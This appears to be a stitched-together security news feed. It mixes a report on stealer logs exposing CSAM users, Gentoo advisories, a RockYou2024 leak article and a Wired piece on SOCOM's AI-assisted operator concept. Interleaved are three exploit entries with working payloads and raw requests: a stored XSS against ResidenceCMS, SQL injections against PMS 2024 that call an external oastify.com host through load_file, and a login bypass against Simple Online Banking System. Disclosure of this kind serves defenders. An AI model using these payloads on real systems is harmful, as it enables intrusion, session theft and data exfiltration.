An analysis of information-stealing malware logs published on the dark web has led to the discovery of thousands of consumers of child sexual abuse material (CSAM), indicating how such information could be used to combat serious crimes.
"Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "

An analysis of information-stealing malware logs published on the dark web has led to the discovery of thousands of consumers of child sexual abuse material (CSAM), indicating how such information could be used to combat serious crimes.

"Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "A notable 4.2% had credentials for multiple sources, suggesting a higher likelihood of criminal behavior."

Over the past few years, off-the-shelf info-stealer variants have become a pervasive and ubiquitous threat targeting various operating systems with an aim to siphon sensitive information such as credentials, cryptocurrency wallets, payment card data, and screenshots.

This is evidenced in the rise of new stealer malware strains such as Kematian Stealer, Neptune Stealer, 0bj3ctivity, Poseidon (formerly RodStealer), Satanstealer, and StrelaStealer.

Distributed via phishing, spam campaigns, cracked software, fake update websites, SEO poisoning, and malvertising, data harvested using such programs typically find their way onto the dark web in the form of stealer logs from where they are purchased by other cybercriminals to further their schemes.

"Employees regularly save corporate credentials on personal devices or access personal resources on organizational devices, increasing the risk of infection," Flare noted in a report last July.

"A complex ecosystem exists in which malware-as-a-service (MaaS) vendors sell info-stealer malware on illicit Telegram channels, threat actors distribute it through fake cracked software or phishing emails, and they then sell infected device logs on specialized dark web marketplaces."

Recorded Future's Insikt Group said it was able to identify 3,324 unique credentials used to access known CSAM domains between February 2021 and February 2024, using them to unmask three individuals who have been found to maintain accounts at no less than four websites.

The fact that stealer logs also comprise cryptocurrency wallet addresses means it could be used to determine if the addresses have been used to procure CSAM and other harmful material.

Furthermore, countries like Brazil, India, and the U.S. had the highest counts of users with credentials to known CSAM communities, although the company said that it could be due to an "overrepresentation due to dataset sourcing."

"Info-stealer malware and stolen credentials are projected to remain a cornerstone of the cybercriminal economy due to the high demand by threat actors seeking initial access to targets," it said, adding it has shared its findings with law enforcement.

"Info-stealer logs can be used by investigators and law enforcement partners to track child exploitation on the dark web and provide insight into a part of the dark web that is especially difficult to trace."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Dark Web Malware Logs Expose 3,300 Users Linked to Child Abuse Sites

Gentoo Linux Security Advisory 202407-21 - Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service. Versions greater than or equal to 1.8.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: X.Org X11 library: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #877461, #908549, #915129  
       ID: 202407-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in the X.Org X11 library,  
the worst of which could lead to a denial of service.

Background  
==========

X.Org is an implementation of the X Window System. The X.Org X11 library  
provides the X11 protocol library files.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
x11-libs/libX11  < 1.8.7       >= 1.8.7

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X11 library.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All X.Org X11 library users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-libs/libX11-1.8.7"

References  
==========

[ 1 ] CVE-2022-3554  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3554  
[ 2 ] CVE-2022-3555  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3555  
[ 3 ] CVE-2023-3138  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3138  
[ 4 ] CVE-2023-43785  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43785  
[ 5 ] CVE-2023-43786  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43786  
[ 6 ] CVE-2023-43787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43787

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-21

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-21

ResidenceCMS versions 2.10.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form# Date: 8-7-2024# Category: Web Application# Exploit Author: Jeremia Geraldi Sihombing# Version: 2.10.1# Tested on: Windows# CVE: CVE-2024-39143Description:----------------A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered..Steps to reproduce-------------------------1. Login as a low privilege user with property edit capability.2. Create or Edit one of the user owned property (We can user the default property owned by the user).3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not.Vulnerable parameter name: property[property_description][content]Example Payload: <img src="x" onerror="alert(document.cookie)">4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account.Burp Request-------------------POST /en/user/property/7/edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 1111Origin: http://localhostConnection: keep-aliveReferer: http://localhost/en/user/property/7/editCookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=falseUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=1property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

ResidenceCMS 2.10.1 Cross Site Scripting

Gentoo Linux Security Advisory 202407-20 - A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation. Versions greater than or equal to 5.27.11.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: KDE Plasma Workspaces: Privilege Escalation  
     Date: July 06, 2024  
     Bugs: #933342  
       ID: 202407-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in KDE Plasma Workspaces, which can  
lead to privilege escalation.

Background  
==========

KDE Plasma workspace is a widget based desktop environment designed to  
be fast and efficient.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
kde-plasma/plasma-workspace  < 5.27.11.1   >= 5.27.11.1

Description  
===========

Multiple vulnerabilities have been discovered in KDE Plasma Workspaces.  
Please review the CVE identifiers referenced below for details.

Impact  
======

KSmserver, KDE's XSMP manager, incorrectly allows connections via ICE  
based purely on the host, allowing all local connections. This allows  
another user on the same machine to gain access to the session  
manager.

A well crafted client could use the session restore feature to execute  
arbitrary code as the user on the next boot.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All KDE Plasma Workspaces users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=kde-plasma/plasma-workspace-5.27.11.1"

References  
==========

[ 1 ] CVE-2024-36041  
      https://nvd.nist.gov/vuln/detail/CVE-2024-36041

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-20

PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi## Author: nu11secur1ty## Date: 07/06/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE(SELECT (CASE WHEN (4671=4671) THEN 0x31+(selectload_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+''ELSE 0x28 END)) AND 'apSt'='apSt    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' ANDEXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT(ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi---```## Reproduce:[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)## Time spent:01:37:00

PMS 2024 1.0 SQL Injection

Gentoo Linux Security Advisory 202407-19 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #932375  
       ID: 202407-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.11.0    >= 115.11.0  
mail-client/thunderbird-bin  < 115.11.0    >= 115.11.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.11.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.11.0"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 4 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 5 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 6 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 7 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-19

Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N/A# Exploit Author: bRpsd# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | XamppPOC:POST http://localhost/banking/classes/Login.php?f=loginHost: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 36Origin: http://localhostConnection: keep-aliveReferer: http://localhost/banking/admin/login.phpCookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername=A' OR 1=1#&password=123    Vuln code:/classes/Login.phpVuln parameter:username    public function login(){    extract($_POST);    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");    if($qry->num_rows > 0){      foreach($qry->fetch_array() as $k => $v){        if(!is_numeric($k) && $k != 'password'){          $this->settings->set_userdata($k,$v);        }      }      $this->settings->set_userdata('login_type',1);    return json_encode(array('status'=>'success'));    }else{    return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));    }  }

Simple Online Banking System 1.0 SQL Injection

Gentoo Linux Security Advisory 202407-18 - A vulnerability has been discovered in Stellarium, which can lead to arbitrary file writes. Versions greater than or equal to 23.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Stellarium: Arbitrary File Write  
     Date: July 05, 2024  
     Bugs: #905300  
       ID: 202407-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Stellarium, which can lead to  
arbitrary file writes.

Background  
==========

Stellarium is a free open source planetarium for your computer. It shows  
a realistic sky in 3D, just like what you see with the naked eye,  
binoculars or a telescope.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
sci-astronomy/stellarium  < 23.1        >= 23.1

Description  
===========

A vulnerability has been discovered in Stellarium. Please review the CVE  
identifier referenced below for details.

Impact  
======

Attackers can write to files that are typically unintended, such as ones  
with absolute pathnames or .. directory traversal.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Stellarium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sci-astronomy/stellarium-23.1"

References  
==========

[ 1 ] CVE-2023-28371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28371

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-18

A list, known as RockYou2024, of almost 10 billion passwords has been released on a hacking forum. What are the dangers?

On a popular hacking form, a user has leaked a file that contains 9,948,575,739 unique plaintext passwords. The list appears to be a compilation of passwords that were obtained during several old and more recent data breaches.

The list is referred to as RockYou2024 because of its filename, rockyou.txt.

To cybercriminals the list has some value because it contains real-world passwords. This means if an attacker tried this list of passwords to try to break into an account (known as a brute force attack) they’s be more likely to get in than just trying a list of any old letters and words. However, it’s highly unlikely that there are any services or websites that would allow anyone to try such an enormous number of passwords, so it’s really only useful to attackers who have stolen a password database and are trying to crack its passwords offline, on their own computer.

Another possible use for cybercriminals is to combine the list with data from other breaches, such as combinations of usernames and passwords, which could get results if the password has been reused. If the cybercriminals also have a list that contains hashed passwords, they could even try to match the hash values of the passwords.

Having the actual password makes an attack a lot easier than when you’re trying a pass-the-hash attack, where an attacker tries to authenticate to a remote server or service by using the hash of a user’s password. However, this only works on services that are vulnerable to pass-the-hash attacks, instead of requiring the associated plaintext password as is normally the case.

To cut a long story short, if you don’t reuse passwords and never use “simple” passwords, like single words, then this release should not concern you. If you use multi-factor authentication (MFA), and you should everywhere you can, there’s also no reason to worry about this.

Malwarebytes has a free tool for you to find out how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 &#8216;RockYou2024&#8217;: Nearly 10 billion passwords leaked online 

The US military has abandoned its half-century dream of a suit of powered armor in favor of a “hyper enabled operator,” a tactical AI assistant for special operations forces.

The day is slowly turning into night, and the American special operators are growing concerned. They are deployed to a densely populated urban center in a politically volatile region, and local activity has grown increasingly frenetic in recent days, the roads and markets overflowing with more than the normal bustle of city life. Intelligence suggests the threat level in the city is high, but the specifics are vague, and the team needs to maintain a low profile—a firefight could bring known hostile elements down upon them. To assess potential threats, the Americans decide to take a more cautious approach. Eschewing conspicuous tactical gear in favor of blending in with potential crowds, an operator steps out into the neighborhood's main thoroughfare to see what he can see.

With a click of a button, the operator sees … everything. A complex suite of sensors affixed to his head-up display start vacuuming up information from the world around him. Body language, heart rates, facial expressions, and even ambient snatches of conversation in local dialects are rapidly collected and routed through his backpack supercomputers for processing with the help of an onboard artificial intelligence engine. The information is instantly analyzed, streamlined, and regurgitated back into the head-up display. The assessment from the operators’ tactical AI sidekick comes back clear: There are a series of seasonal events coming into town, and most passersby are excited and exuberant, presenting a minimal threat to the team. Crisis averted—for now.

This is one of many potential scenarios repeatedly presented by Defense Department officials in recent years when discussing the future of US special operations forces, those elite troops tasked with facing the world’s most complex threats head-on as the “tip of the spear” of the US military. Both defense officials and science-fiction scribes may have envisioned a future of warfare shaped by brain implants and performing enhancing drugs, or a suit of powered armor straight out of _Starship Troopers_, but according to US Special Operations Command, the next generation of armed conflict will be fought (and, hopefully, won) with a relatively simple concept: the “hyper enabled operator.”

**More Brains, Less Brawn**

First introduced to the public in 2019 in an essay by officials from SOCOM’s Joint Acquisition Task Force (JATF) for Small Wars Journal, the hyper-enabled operator (HEO) concept is the successor program to the Tactical Assault Light Operator Suit (TALOS) effort that, initiated in 2013, sought to outfit US special operations forces with a so-called “Iron Man” suit. Inspired by the 2012 death of a Navy SEAL during a hostage rescue operation in Afghanistan, TALOS was intended to improve operators’ survivability in combat by making them virtually resistant to small-arms fire through additional layers of sophisticated armor, the latest installment of the Pentagon’s decades-long effort to build a powered exoskeleton for infantry troops. While the TALOS effort was declared dead in 2019 due to challenges integrating its disparate systems into one cohesive unit, the lessons learned from the program gave rise to the HEO as a natural successor.

The core objective of the HEO concept is straightforward: to give warfighters “cognitive overmatch” on the battlefield, or “the ability to dominate the situation by making informed decisions faster than the opponent,” as SOCOM officials put it. Rather than bestowing US special operations forces with physical advantages through next-generation body armor and exotic weaponry, the future operator will head into battle with technologies designed to boost their situational awareness and relevant decisionmaking to superior levels compared to the adversary. Former fighter pilot and Air Force colonel John Boyd proposed the “OODA loop” (observe, orient, decide, act) as the core military decisionmaking model of the 21st century; the HEO concept seeks to use technology to “tighten” that loop so far that operators are quite literally making smarter and faster decisions than the enemy.

“The goal of HEO,” as SOCOM officials put it in 2019, “is to get the right information to the right person at the right time.”

To achieve this goal, the HEO concept calls for swapping the powered armor at the heart of the TALOS effort for sophisticated communications equipment and a robust sensor suite built on advanced computing architecture, allowing the operator to vacuum up relevant data and distill it into actionable information through a simple interface like a head-up display—and do so “at the edge,” in places where traditional communications networks may not be available. If TALOS was envisioned as an “Iron Man'' suit, as I previously observed, then HEO is essentially Jarvis, Tony Stark’s built-in AI assistant that’s constantly feeding him information through his helmet’s head-up display.

“\[JATF\] is targeting technologies to deliver cognitive overmatch to SOF operators working at the edge in austere and contested environments in coordination with and working through partners and allies,” SOCOM spokesperson James O. Gregory tells WIRED, invoking a general description of the program from the command’s website. “Such technologies will enable tactical teams of SOF operators to intuitively use information made available by next-generation sensors, networks, computing, and communication systems to rapidly build situation awareness. It will also help make timely, well-informed decisions, and take actions inside an adversary's ability to react.”

**Enter the Gray Zone**

So what does the HEO actually look like today, five years after its introduction into the US military’s tactical lexicon? Given the sensitive (and somewhat notional) nature of the effort, details remain scarce, and SOCOM officials have remained relatively tight-lipped about its progress. But according to SOCOM’s Gregory, the scenario and concept the HEO seeks to address has “evolved” from what officials previously described to reporters at the program’s inception. Indeed, rather than augmenting warfighters deployed to active combat zones, SOCOM officials envision something more like a casually dressed operator vacuuming up information on a busy urban avenue through a Google Glass-like eyepiece and sizing up the situation—in other words, more James Bond than Tony Stark.

“The operational environment for the JATF’s current efforts is in the competition phase of warfare, in permissive or semi-permissive locations,” Gregory says. (A permissive environment is generally defined as an operational environment where US forces have the backing of a host country’s security apparatus, according to the US Army, while a “semi-permissive” environment is potentially hostile and local support is often not reliable.) No longer just another tool for a kinetic assault, the HEO will help elite troops operating in the “gray zone” between peace and conflict.

A SOCOM broad agency announcement—a general request for research and development proposals from the defense industry—published in 2020 and updated as recently as November 2023 details the JATF’s push for advanced technologies designed to boost situational awareness. Those technologies include: intelligence, surveillance, and reconnaissance capabilities “without substantial manning or networking resources” (the aforementioned “at the edge”); sophisticated sensors capable of “iris, facial, anatomical measures, gestures, gait, heartbeat, electromagnetic signals, deoxyribonucleic acid \[DNA\], and microbiome recognition”; low-visibility communications systems; and “data visualizations” that “permit \[operators\] to receive and intuitively understand networked information from communication, computing, and sensor systems,” among others. In short, the HEO envisions systems that enable the constant, real-time collection and distillation of data into actionable intel that could potentially mean the difference between life and death in an uncertain situation.

**Edge Case**

Envisioning a suite of aspirational capabilities is one thing; actually building them is another thing entirely. In terms of developing new products, Gregory says that the HEO effort has remained focused on three major experimental technology areas for the last several years: sensing and edge computing, architecture and analysis, and language translation.

“Sensing and edge computing” generally refers to the collection and processing of data from a variety of sources, but it also refers to the specialized computing power that operators need not only to function “at the edge,” but to actually run the AI-enabled software that will form the foundation of the HEO.

“Emerging technologies and solutions in artificial intelligence/machine learning require specialized ‘compute’ hardware, as traditional CPU-based devices are insufficient,” Gregory says. “We aim to feature a manpack device with a graphics processing unit, neural processing engine, and/or tensor processing unit capabilities. This will provide the necessary platform to leverage advanced technologies like language translation and other solutions at the edge, even when disconnected from the cloud.”

That computing power forms the basis for the “architecture and analysis” element focused on the rapid assessment and presentation of data to operators in the field. Gregory tells WIRED that, to support this element, the command has developed “a flexible \[system\] architecture that fuses data from various sources and media types” into an easily digestible format for operators to assess and act upon.

As for language translation, that’s self-explanatory. SOCOM believes that “prior to any hostilities ever occurring, clear communication can greatly enhance development of our long-term relationships,” Gregory says. “Voice-to-voice translation enables operators to communicate more effectively than relying on often scarce interpreters in the field. Even though many SOF personnel are multilingual, they are frequently deployed to regions with different languages or dialects.”

In line with these experimental technology areas, SOCOM has reportedly concentrated on six immediate lines of product development, per C4ISRNet: the “operator-worn kit” that includes both sensors and onboard computer processing power; application development resources; a unique, mission-agnostic system architecture; the “human-machine interface” that’s generally envisioned as a digital head-up display; a product called “information realization” that likely involves the clear presentation of data; and beyond-line-of-sight (BLoS) communications designed to keep troops in contact with their commanders (and each other) in satellite-denied environments.

According to Gregory, the command has gradually rolled out a handful of fresh capabilities from the HEO effort in recent years. In 2021, SOCOM announced that two products—a BLoS communications system and an unspecified “integrated situational awareness tool”—were transitioning into official programs of record, as Janes reported at the time. Gregory confirmed to WIRED that the BLoS system consists of “a steerable gimble antenna system that enhances the functionality” of the command’s SOF deployable nodes, a family of advanced satellite communications systems. The spokesperson also confirmed that the situational awareness tool, known as SEEKER, is an app that “enables advisers to build advanced situational awareness, thereby allowing them to select actions with an eye toward the broader situation rather than just the immediately apparent problem.” It’s unclear if the latter is related to the “automate the analyst” effort the command kicked off in 2020 to provide operators with an autonomous AI assistant.

Then there’s the “visual environment translation” system that’s designed to convert foreign language inputs into clear English in real time. Known overarchingly as the Versatile Intelligent Translation Assistant (VITA), the system encompasses both a visual environment translation effort and voice-to-voice translation capabilities and is “the most mature” of the JATF’s experimental technology areas, according to SOCOM. VITA is essentially “a voice-to-voice translation engine that functions offline on GPU-enabled devices,” Gregory says, small enough to be carried in the field on a laptop-tethered smartphone or wearable device and “engage in effective conversations where it was previously impossible.” And not only has VITA successfully demonstrated Russian, Chinese Mandarin, and Ukrainian language translation capabilities during testing, but the system has even been deployed to two undisclosed theaters of operations already.

“The visual translation component enhances situational awareness by translating video images, such as street signs, graffiti, and other written texts, in real time,” Gregory says. “Operators can use their phone cameras to scan their surroundings and understand foreign languages instantly.”

VITA provides US special operations forces with “a high-quality translation capability that is not reliant on the cloud or local interpreters, thus significantly reducing risk and logistical costs while increasing operational range and effectiveness for USSOF and our partners,” Gregory says. “The JATF is currently working with industry partners to reduce the size of the hardware and transition it into a SOF Program Executive Office for eventual fielding.” (And that language translation may not be restricted to a mobile device for long: According to SOCOM’s fiscal year 2025 budget request published in March, the command is still plowing ahead with head-mounted sensors and an augmented-reality HUD to present these functions right before operators’ eyes.)

**Field Work**

To US military planners, the HEO concept is promising: According to one Army assessment, the successful adoption of the system could potentially increase operator survivability far beyond that provided by the additional body armor of the TALOS program. But like other potentially revolutionary technology ventures, there’s certainly the possibility that HEO could end up a science fiction dream that collapses under the weight of its own technical complexity. And there’s no guarantee that operators will embrace the new technology seamlessly in the first place: Although VITA has shown operational promise, it’s unclear if other HEO products will prove intuitive enough to actually augment operators in the field rather than burden them with some complicated newfangled system. As Heinlein put it so aptly in _Starship Troopers_: “If you load a mud foot down with a lot of gadgets that he has to watch, somebody a lot more simply equipped—say with a stone ax—will sneak up and bash his head in while he is trying to read a vernier.”

